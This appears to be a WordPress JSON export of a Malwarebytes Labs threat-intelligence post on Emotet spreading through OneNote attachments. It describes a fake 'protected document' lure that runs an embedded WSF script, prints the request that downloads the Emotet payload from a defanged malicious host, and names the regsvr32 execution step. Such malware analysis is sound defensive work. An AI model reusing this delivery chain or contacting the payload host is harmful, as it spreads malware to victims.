{"id":21500,"date":"2023-03-16T16:11:07","date_gmt":"2023-03-17T00:11:07","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/03\/16\/news-15231\/"},"modified":"2023-03-16T16:11:07","modified_gmt":"2023-03-17T00:11:07","slug":"news-15231","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/03\/16\/news-15231\/","title":{"rendered":"Emotet adopts Microsoft OneNote attachments"},"content":{"rendered":"<p>Last week, <a href=\"https:\/\/cofense.com\/blog\/emotet-sending-malicious-emails-after-three-month-hiatus\/\" target=\"_blank\">Emotet returned<\/a> after a three month absence&nbsp;when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.<\/p>\n<p>Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet&#8217;s turn to follow along.<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/easset_upload_file72517_262451_e.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/easset_upload_file72517_262451_e.png\" alt=\"\" width=\"942\" height=\"617\" \/><\/a><\/p>\n<p>The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.<\/p>\n<p>This triggers Windows scripting engine (wscript.exe) to execute the following command:<\/p>\n<pre data-stringify-type=\"pre\">%Temp%OneNote16.0NT\u0000click.wsf\"<\/pre>\n<p>The heavily obfuscated&nbsp;script retrieves the Emotet binary payload from a remote site<\/p>\n<pre data-stringify-type=\"pre\">GET https:\/\/penshorn[.]org\/admin\/Ses8712iGR8du\/ HTTP\/1.1 Connection: Keep-Alive Accept: *\/* User-Agent: Mozilla\/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: penshorn.org <\/pre>\n<p>The file is saved as a DLL and executed via regsvr32.exe:<\/p>\n<pre data-stringify-type=\"pre\">%Temp%OneNote16.0NT\u0000rad44657.tmp.dll\"<\/pre>\n<p>Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.<\/p>\n<p>As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our&nbsp;<a href=\"https:\/\/try.malwarebytes.com\/2023-state-of-malware\/?utm_source=blog&amp;utm_medium=social&amp;utm_campaign=b2b_ws_global_som_167578574700\" target=\"_blank\">2023 State of Malware Report<\/a>, as it serves as an entry point for other threat actors keen on dropping ransomware.<\/p>\n<p>Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/easset_upload_file79523_262451_e.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/easset_upload_file79523_262451_e.png\" alt=\"\" width=\"1220\" height=\"675\" \/><\/a><\/p>\n<p dir=\"ltr\">Although&nbsp;Emotet has&nbsp;had vacations, <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2021\/12\/emotets-back-and-it-isnt-wasting-any-time\" target=\"_blank\">retirements<\/a> and even been <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2021\/01\/cleaning-up-after-emotet-the-law-enforcement-file\" target=\"_blank\">taken down by authorities<\/a> before, it continues to be a serious threat and highlights how social engineering attacks&nbsp;are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.<\/p>\n<p dir=\"ltr\">We will continue to monitor any new developments with Emotet to ensure our customers remain protected.<\/p>\n<hr \/>\n<p dir=\"ltr\">Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.<\/p>\n<p style=\"text-align: center;\"><span class=\"blue-cta-bttn\" style=\"background-color: #0d3ecc; line-height: 50px; padding: 0 20px;\"><a style=\"color: #fff;\" href=\"https:\/\/www.malwarebytes.com\/business\/contact-us\/\">GET STARTED<\/a><\/span><\/p>\n<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/emotet-onenote\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding=\"10\">\n<tr>\n<td valign=\"top\" align=\"left\">\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/threat-intelligence\" rel=\"category tag\">Threat Intelligence<\/a><\/p>\n<p>Emotet finally got the memo and added Microsoft OneNote lures.<\/p>\n<table width=\"100%\">\n<tr>\n<td align=\"right\">\n<p><b>(<a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/emotet-onenote\" title=\"Emotet adopts Microsoft OneNote attachments\">Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/03\/emotet-onenote\">Emotet adopts Microsoft OneNote attachments<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[12040],"class_list":["post-21500","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-threat-intelligence"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21500"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21500\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21500"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}